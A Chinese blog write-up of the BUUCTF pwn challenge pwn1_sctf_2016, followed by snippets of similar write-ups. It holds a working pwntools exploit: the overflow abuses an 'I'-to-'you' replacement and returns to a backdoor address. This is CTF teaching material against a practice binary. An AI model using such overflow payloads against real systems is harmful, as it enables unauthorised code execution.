【BUUCTF - PWN】pwn1_sctf_2016

最新推荐文章于 2024-07-04 23:59:54 发布
最新推荐文章于 2024-07-04 23:59:54 发布
阅读量4.2k 收藏 4
点赞数
分类专栏: BUUCTF - PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tqydyqt/article/details/104973193
版权

checksec一下

找到漏洞函数,s的长度为0x3c,而我们只能输入32个字符,不足以栈溢出,但是发现replace函数会把输入的 I 替换成 you ,这样的话输入20个 I 就能填满s

找到后门函数

from pwn import *
from LibcSearcher import *

context.os='linux'
context.arch='i386'
context.log_level='debug'

sl=lambda x:io.sendline(x)

io=remote('xxx',xxx)

payload='I'*20+'a'*4+p32(0x8048f0d)
sl(payload)

io.interactive()

附件:pwn1_sctf_2016

古月浪子
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF:[Black Watch 入群题]PWN(write up)
qq_44768749的博客
08-23 901
BUUCTF:[Black Watch 入群题]PWN0x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp0x06 栈迁移补充32位程序 0x01 文件分析 开启了栈不可执行 0x02 运行 运行一下没什么特殊的,猜测应该是栈溢出 0x03 IDA 虽然buf在栈上但输入的长度仅仅能够覆盖ebp和返回地址,但s在bss段,而且输入的长度也够长,因此想到了栈迁移,覆盖vul_function返回地址,使其到bss段上执行 0x04 思路 s在bss段上的地址为0
BUUCTF-pwn2_sctf_2016
weixin_44145820的博客
03-06 971
这题利用的是负数转无符号数造成缓冲区溢出,以及泄露libc基地址执行ROP 题目分析 由于NX开启,我们考虑使用ROP,Canary没有打开使得这题变得很方便 下面是vuln函数: 在该函数中,程序读入一个字符串并转化为带符号整形(signed int),这时,如果我们输入负数可以避开不能大于32的检查 在get_n函数中,读入长度被强制转换为unsigned int,此时-1变成了42949...
BUUCTF Pwn pwn1_sctf_2016
MrTreebook的博客
12-05 1304
BUUCTF Pwn pwn1_sctf_20161.题目下载地址2.checksec检查保护3.IDA分析4.看一下栈大小5.找到后门函数地址6.exp 1.题目下载地址 点击下载题目 2.checksec检查保护 运行一下看看 3.IDA分析 看一下伪代码 int vuln() { const char *v0; // eax char s[32]; // [esp+1Ch] [ebp-3Ch] BYREF char v3[4]; // [esp+3Ch] [ebp-1Ch] BYREF
BUUCTF-PWN】5-pwn1_sctf_2016
最新发布
燕麦葡萄干的博客
07-04 145
变量s在栈中的位置位0x3c,想要溢出到Rbp需要60+4(因为是32位)=64。fgets()函数只允许输入32位长度,但是I可以变为you,因此可以输入20个I加三个a。这里中间处理的代码还看不太懂,只能看到you、i还有replace字符替换函数。试着运行效果如下,可知代码会把输入的I替换为you。找一下后门函数,函数的位置是0x8048F0D。strcpy()函数存在缓冲区溢出。32位,开启了NX保护。
[BUUCTF-pwn]——pwn1_sctf_2016
Y_peak的博客
01-30 888
[BUUCTF-pwn]——pwn1_sctf_2016 题目地址:https://buuoj.cn/challenges#pwn1_sctf_2016 题目: 话不多说,先下载下来再说。 在Linux上 checksec一下,发现开启了NX保护,但是没有开启Stack的保护,也就是说我们可以很轻易的利用栈溢出。 在window的IDA上反汇编看下源码,额 ,main函数没有什么有用的信息。我们可以看下vuln函数。 发现好大一堆,发现了fgets函数,但是很遗憾。它要求我们只能输入不超过32个字符。
BUUCTF pwn1_sctf_2016
CHAWUCIREN1的博客
04-08 3422
执行一下 似乎出现第一个i被替换成you 检查一下保护机制 丢到ida里面 输入的变量s大小为0x3c,但是我们看fgets里面,我们只能输入32个字符,没法进行溢出, 我们在输入的时候,会发现i会被替换成you,所以我们可以利用20个i来填充, 找到shell,地址为0x8048F0D 返回地址再随便填四个字符 我们可以构造一下payload payload = ‘I’*20 + p64(0x8048F0D) 这里特别注意一下 payload可以有多种写法 ‘I’ *19 + ‘A’*7 + p
[buuctf]pwn1_sctf_2016
逆向萌新的博客
05-30 1513
buuctfpwnpwn1_sctf_2016(细致分析)
BUUCTF pwn pwn2_sctf_2016
菜的只能随便写写博客
02-18 2507
0x01 分析   0x02 运行  程序读入一个长度,然后按照长度读入后面输入的data并回显。   0x03 IDA  数据长度被限制为32,无法溢出,接着查看get_n函数。  接受a2个长度的字符串并放到vuln函数的缓冲区内部,但是a2传入的值类型是unsigned int,而前面判断长度的类型是int,可以规避长度限制。   0x04 思路  输入负数长度,绕过长度检查,执行r...
日行一pwnpwn1_sctf_2016
m0_57221101的博客
05-13 586
用俩图床,有的有水印,有的没水印,折磨 距离上一次日行一pwn已经快一个月了,干脆改成月行一pwn吧(汗。这段时间去恶补了王爽老师的汇编语言。 结果一回来就做了这么一道题,函数封装的严严实实,打眼一看全是C++。想入门pwn这么难吗。 正片 BUUCTF在线评测 使用BUUCTF靶场,首先标准步骤下载--放到kali里面查--拖到windows用ida反汇编 发现只有一个NX保护 NX保护就是CPU不会执行放在内存段中的代码,也就是我们之前在BOF中学习的像内存中写入Shell的方法
BUUCTF-PWN刷题记录-14
weixin_44145820的博客
04-29 760
目录sctf_2019_easy_heap(块重叠,double free) sctf_2019_easy_heap(块重叠,double free) 这题原题目好像是在Ubuntu16下的,但是BUU上面是Ubuntu18,所以应该更简单一点 总的来说,这题应该是ciscn_2019_final_3的加强版吧,当然也有更简单的地方 首先,给了我们一块rwx的空间 add函数会给你conten...
BUUCTF-pwn刷题记录(22-7-30更新)
Morphy_Amo的博客
03-04 4319
BUUCTF刷题记录
pwn1_sctf_2016
怪味巧克力的博客
07-17 2304
0x01 拿到文件先检查一下 32位程序 开启了NX保护 IDA静态分析一下 分配的s空间为60,限制输入32,乍一看是不会造成栈溢出的,但是下面有一个字符替换,就是输入I会被替换成you。I是一个字符,you是三个字符,那么我们可以输入20个I(满足32的限制),那么这20个I,最终被替换成了60个字符,从而造成溢出 0x02 exp: from pwn import * filename = 'pwn1_sctf_2016' e = ELF(filename) get_flag = e.symb
BUUCTF|PWN-pwn1_sctf_2016-WP
l2645470582_的博客
07-29 731
1、下载文件并开启靶机 2、在Linux中查看该文件信息 checksec pwn1_sctf_2016 3、该文件是62为文件,我们用32为IDA打开该文件 3.1、shift+f12查看关键字符串 3.2、双击关键字符串,ctrl+x查看cat flag.txt地址 3.3、F5进入main函数反编译代码区 3.4、看到有个vuln()关键函数,双击进去 3.5、我们看见关键字变量名溢出,双击查看 s地址: r地址: ...
buu pwn1_sctf_2016
m0_63253040的博客
09-11 191
但当我们输入I的时候,I会被替换成you,所以我们依然可以溢出。s的输入被限制为32,但是溢出需要输入60个字符。字符串替换,输入限制。
pwn1_sctf_20161
m0_74091653的博客
09-25 240
函数相对安全,因为它可以限制读取的字符数,防止缓冲区溢出。但是可以发现会将输入的 I 换成 you。发现fgetsg函数 溢出0x3c。指向的字符数组中,直到遇到换行符。也就是我们可以用20个 I 来溢出。也找出了cat flag.txt。中读取字符,并将其存储在。这里我们正常溢出是不行的。
PWN (3) pwn1_sctf_2016 1
brightendavid的博客
05-11 468
查找字符串,发现了一个flag.txt。 输入在这里 限制为32长度的输入
BUUCTF刷题之路-pwn1_sctf_20161
qq_30528603的博客
05-27 458
从我们的运行结果看,会把用户输入的I换成you。那就是说会自动帮我们把1字节变3字节,我们可以利用填充I来让程序自动填充到返回地址前。s距离ebp是0x3c也就是60个字节,那么我们填充20个I再加4个字节填充接着拼接我们的后门地址。但是新的问题产生了,fgets函数较gets函数安全一点,他有长度限制,我们看到s离ebp的距离有0x3c那么远,但是fgets只能输入32个字节,只通过fgets溢出覆盖不到返回地址。看到有个fgets函数,并且限制长度为32。这是一个32位的程序,只开启了NX保护。
./pwn1_sctf_2016: error while loading shared libraries: libstdc++.so.6: cannot open shared object file: No such file or directory
09-02
这个错误通常发生在缺少 libstdc++.so.6 库文件时。解决这个问题的方法是安装 libstdc++ 库。你可以尝试使用以下命令来安装它: 对于 Ubuntu 或 Debian 系统: ``` sudo apt-get install libstdc++6 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值